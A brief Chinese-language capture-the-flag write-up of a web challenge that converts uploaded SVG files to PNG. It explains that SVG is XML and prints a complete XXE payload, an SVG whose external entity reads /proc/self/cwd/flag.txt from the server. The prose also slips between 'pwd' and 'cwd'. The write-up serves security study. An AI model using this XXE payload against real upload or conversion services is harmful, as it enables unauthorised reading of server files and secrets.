进去后是一个这样的页面
这里大标题给出提示使用 Magic 将 SVG 转换为 PNG
那啥是SVG呢,先来了解一下
这里SVG是个XML的图片,并且存在可控的内容
这里可以尝试一下XEE漏洞的这种情况
由于不知道flag的路径,所以先用/proc/self/pwd/代表的是当前路径。可以构造/proc/self/pwd/flag.txt读取文件.
最终构造.svg文件内容为
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="100" width="1000">
<text x="10" y="20">&file;</text>
</svg>
上传成功即可获得flag.